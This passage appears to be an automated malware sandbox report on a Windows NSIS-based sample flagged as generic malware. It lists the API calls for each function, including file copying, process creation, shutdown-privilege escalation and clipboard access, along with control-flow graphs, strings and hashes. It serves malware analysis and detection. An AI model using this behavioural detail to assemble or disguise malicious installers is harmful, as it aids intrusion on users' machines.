                                                                                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403829
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403831
                                                                                                                        • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403845
                                                                                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040391E
                                                                                                                          • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                                                        • wsprintfW.USER32 ref: 0040397B
                                                                                                                        • GetFileAttributesW.KERNEL32(916,C:\Users\user\AppData\Local\Temp\), ref: 004039AE
                                                                                                                        • DeleteFileW.KERNEL32(916), ref: 004039BA
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004039E8
                                                                                                                          • Part of subcall function 004062E1: MoveFileExW.KERNEL32(?,?,00000005,00405DDF,?,00000000,000000F1,?,?,?,?,?), ref: 004062EB
                                                                                                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,916,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004039FE
                                                                                                                          • Part of subcall function 00405B04: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,916,?), ref: 00405B2D
                                                                                                                          • Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?,916,?), ref: 00405B3A
                                                                                                                          • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(?,00425F58,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000000,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp, 44v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76343420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                                                          • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                                                                                                                        • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A4C
                                                                                                                        • ExitProcess.KERNEL32 ref: 00403A69
                                                                                                                        • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,916,00000000), ref: 00403A70
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A8C
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403A93
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403ACB
                                                                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
                                                                                                                        • ExitProcess.KERNEL32 ref: 00403B13
                                                                                                                          • Part of subcall function 00405ACF: CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"$1033$916$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe$C:\Users\user\polaritets$C:\Users\user\polaritets$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                        • API String ID: 1813718867-3441369084
                                                                                                                        • Opcode ID: 861c3a791dac713e5dc6c418a8dec487fa289242a5d5f99aa186722fda572ff2
                                                                                                                        • Instruction ID: bee44f309595f2ff458e9cecae568de25c9667724a66d0f49069eb89ae1a0629
                                                                                                                        • Opcode Fuzzy Hash: 861c3a791dac713e5dc6c418a8dec487fa289242a5d5f99aa186722fda572ff2
                                                                                                                        • Instruction Fuzzy Hash: FDF10170204301ABD720AF659D05B2B3EE8EB8570AF11483EF581B62D1DB7DCA45CB6E
                                                                                                                        Function 004056E5 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 151 4056e5-405700 152 405706-4057cd GetDlgItem * 3 call 4044d5 call 404e2e GetClientRect GetSystemMetrics SendMessageW * 2 151->152 153 40588f-405896 151->153 174 4057eb-4057ee 152->174 175 4057cf-4057e9 SendMessageW * 2 152->175 155 4058c0-4058cd 153->155 156 405898-4058ba GetDlgItem CreateThread CloseHandle 153->156 158 4058eb-4058f5 155->158 159 4058cf-4058d5 155->159 156->155 163 4058f7-4058fd 158->163 164 40594b-40594f 158->164 161 405910-405919 call 404507 159->161 162 4058d7-4058e6 ShowWindow * 2 call 4044d5 159->162 171 40591e-405922 161->171 162->158 169 405925-405935 ShowWindow 163->169 170 4058ff-40590b call 404479 163->170 164->161 167 405951-405957 164->167 167->161 176 405959-40596c SendMessageW 167->176 172 405945-405946 call 404479 169->172 173 405937-405940 call 4055a6 169->173 170->161 172->164 173->172 180 4057f0-4057fc SendMessageW 174->180 181 4057fe-405815 call 4044a0 174->181 175->174 182 405972-40599d CreatePopupMenu call 40655e AppendMenuW 176->182 183 405a6e-405a70 176->183 180->181 190 405817-40582b ShowWindow 181->190 191 40584b-40586c GetDlgItem SendMessageW 181->191 188 4059b2-4059c7 TrackPopupMenu 182->188 189 40599f-4059af GetWindowRect 182->189 183->171 188->183 193 4059cd-4059e4 188->193 189->188 194 40583a 190->194 195 40582d-405838 ShowWindow 190->195 191->183 192 405872-40588a SendMessageW * 2 191->192 192->183 196 4059e9-405a04 SendMessageW 193->196 197 405840-405846 call 4044d5 194->197 195->197 196->196 198 405a06-405a29 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405a2b-405a52 SendMessageW 198->200 200->200 201 405a54-405a68 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->183
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 00405743
                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00405752
                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040578F
                                                                                                                        • GetSystemMetrics.USER32(00000002), ref: 00405796
                                                                                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B7
                                                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C8
                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057DB
                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E9
                                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FC
                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581E
                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405832
                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405853
                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405863
                                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587C
                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405888
                                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405761
                                                                                                                          • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004058A5
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005679,00000000), ref: 004058B3
                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004058BA
                                                                                                                        • ShowWindow.USER32(00000000), ref: 004058DE
                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 004058E3
                                                                                                                        • ShowWindow.USER32(00000008), ref: 0040592D
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405961
                                                                                                                        • CreatePopupMenu.USER32 ref: 00405972
                                                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405986
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004059A6
                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BF
                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F7
                                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405A07
                                                                                                                        • EmptyClipboard.USER32 ref: 00405A0D
                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A19
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405A23
                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A37
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405A57
                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405A62
                                                                                                                        • CloseClipboard.USER32 ref: 00405A68
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                        • String ID: {
                                                                                                                        • API String ID: 590372296-366298937
                                                                                                                        • Opcode ID: bcd6524ca319c6da9779c5e50c73cceb5f6d9afdf0ecbcca2ead9855fe138ddf
                                                                                                                        • Instruction ID: bfdbfabbc3eccdd340dcac883e36f8678c6b127a6a9b52dc92d7db9eae4071ee
                                                                                                                        • Opcode Fuzzy Hash: bcd6524ca319c6da9779c5e50c73cceb5f6d9afdf0ecbcca2ead9855fe138ddf
                                                                                                                        • Instruction Fuzzy Hash: FBB127B1900618FFDB11AF60DD89AAE7B79FB44354F00813AFA41B61A0CB754A92DF58
                                                                                                                        Function 00405C2D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 509 405c2d-405c53 call 405ef8 512 405c55-405c67 DeleteFileW 509->512 513 405c6c-405c73 509->513 514 405de9-405ded 512->514 515 405c75-405c77 513->515 516 405c86-405c96 call 406521 513->516 517 405d97-405d9c 515->517 518 405c7d-405c80 515->518 522 405ca5-405ca6 call 405e3c 516->522 523 405c98-405ca3 lstrcatW 516->523 517->514 521 405d9e-405da1 517->521 518->516 518->517 524 405da3-405da9 521->524 525 405dab-405db3 call 40687e 521->525 526 405cab-405caf 522->526 523->526 524->514 525->514 533 405db5-405dc9 call 405df0 call 405be5 525->533 529 405cb1-405cb9 526->529 530 405cbb-405cc1 lstrcatW 526->530 529->530 532 405cc6-405ce2 lstrlenW FindFirstFileW 529->532 530->532 534 405ce8-405cf0 532->534 535 405d8c-405d90 532->535 549 405de1-405de4 call 4055a6 533->549 550 405dcb-405dce 533->550 539 405d10-405d24 call 406521 534->539 540 405cf2-405cfa 534->540 535->517 538 405d92 535->538 538->517 551 405d26-405d2e 539->551 552 405d3b-405d46 call 405be5 539->552 543 405cfc-405d04 540->543 544 405d6f-405d7f FindNextFileW 540->544 543->539 545 405d06-405d0e 543->545 544->534 548 405d85-405d86 FindClose 544->548 545->539 545->544 548->535 549->514 550->524 553 405dd0-405ddf call 4055a6 call 4062e1 550->553 551->544 554 405d30-405d39 call 405c2d 551->554 562 405d67-405d6a call 4055a6 552->562 563 405d48-405d4b 552->563 553->514 554->544 562->544 566 405d4d-405d5d call 4055a6 call 4062e1 563->566 567 405d5f-405d65 563->567 566->544 567->544
                                                                                                                        APIs
                                                                                                                        • DeleteFileW.KERNELBASE(?,?,76343420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"), ref: 00405C56
                                                                                                                        • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,76343420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"), ref: 00405C9E
                                                                                                                        • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,76343420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"), ref: 00405CC1
                                                                                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,76343420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"), ref: 00405CC7
                                                                                                                        • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,76343420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"), ref: 00405CD7
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D77
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00405D86
                                                                                                                        Strings
                                                                                                                        • \*.*, xrefs: 00405C98
                                                                                                                        • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe", xrefs: 00405C36
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C3A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                        • API String ID: 2035342205-1373261282
                                                                                                                        • Opcode ID: 9251ba415d381c0528a68256adb7b13e134a55f337ff098e8b7b00a93e79b23f
                                                                                                                        • Instruction ID: aec485693c4c1533f42b9347a66a6bbcb57ea8568fe9c979ecac7928daa7b7f5
                                                                                                                        • Opcode Fuzzy Hash: 9251ba415d381c0528a68256adb7b13e134a55f337ff098e8b7b00a93e79b23f
                                                                                                                        • Instruction Fuzzy Hash: 8741D230801A14BADB31BB659D4DAAF7678EF41718F14813FF801B11D5D77C8A829EAE
                                                                                                                        Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 573 401774-401799 call 402dab call 405e67 578 4017a3-4017b5 call 406521 call 405df0 lstrcatW 573->578 579 40179b-4017a1 call 406521 573->579 584 4017ba-4017bb call 4067cf 578->584 579->584 588 4017c0-4017c4 584->588 589 4017c6-4017d0 call 40687e 588->589 590 4017f7-4017fa 588->590 597 4017e2-4017f4 589->597 598 4017d2-4017e0 CompareFileTime 589->598 592 401802-40181e call 406011 590->592 593 4017fc-4017fd call 405fec 590->593 600 401820-401823 592->600 601 401892-4018bb call 4055a6 call 4032b9 592->601 593->592 597->590 598->597 602 401874-40187e call 4055a6 600->602 603 401825-401863 call 406521 * 2 call 40655e call 406521 call 405b81 600->603 613 4018c3-4018cf SetFileTime 601->613 614 4018bd-4018c1 601->614 615 401887-40188d 602->615 603->588 635 401869-40186a 603->635 618 4018d5-4018e0 CloseHandle 613->618 614->613 614->618 619 402c38 615->619 621 4018e6-4018e9 618->621 622 402c2f-402c32 618->622 623 402c3a-402c3e 619->623 625 4018eb-4018fc call 40655e lstrcatW 621->625 626 4018fe-401901 call 40655e 621->626 622->619 632 401906-40239d 625->632 626->632 636 4023a2-4023a7 632->636 637 40239d call 405b81 632->637 635->615 638 40186c-40186d 635->638 636->623 637->636 638->602
                                                                                                                        APIs
                                                                                                                        • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\polaritets,?,?,00000031), ref: 004017B5
                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\polaritets,?,?,00000031), ref: 004017DA
                                                                                                                          • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                                                          • Part of subcall function 004055A6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                                                          • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                                                          • Part of subcall function 004055A6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                                                                                          • Part of subcall function 004055A6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll), ref: 00405613
                                                                                                                          • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                                                          • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                                                          • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nst8185.tmp$C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll$C:\Users\user\polaritets$Call
                                                                                                                        • API String ID: 1941528284-2501724552
                                                                                                                        • Opcode ID: 8735ad9560c18e5a7f29f6a8244760e17f86ea249fb7e5f19f194b0f67ebe764
                                                                                                                        • Instruction ID: 1777f765e23ed303a4c4324df0f40fc052c607b9e3f25272d24a03cacca2a4dc
                                                                                                                        • Opcode Fuzzy Hash: 8735ad9560c18e5a7f29f6a8244760e17f86ea249fb7e5f19f194b0f67ebe764
                                                                                                                        • Instruction Fuzzy Hash: 9E41A531900509BACF117BA9DD86DAF3AB5EF45328B20423FF512B10E1DB3C8A52966D
                                                                                                                        Function 0040687E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNELBASE(?,00425F58,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000000,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp, 44v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76343420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00406895
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\nst8185.tmp, xrefs: 0040687E
                                                                                                                        • X_B, xrefs: 0040687F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nst8185.tmp$X_B
                                                                                                                        • API String ID: 2295610775-1899747280
                                                                                                                        • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                                                                        • Instruction ID: 6d56574ea64d1328abe48e6f64e5cab5a12c2004fb3b9259b4ed260009733db8
                                                                                                                        • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                                                                        • Instruction Fuzzy Hash: AFD0123250A5205BC6406B386E0C84B7A58AF553717268A36F5AAF21E0CB788C6696AC
                                                                                                                        Function 00406C3F Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                                                                                        • Instruction ID: 98dfc50ccd9688b87079ede1b44bfc78bfb7a95d74622a08e623e0ee65e5f8c5
                                                                                                                        • Opcode Fuzzy Hash: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                                                                                        • Instruction Fuzzy Hash: B2F17870D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45
                                                                                                                        Function 00403FA1 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
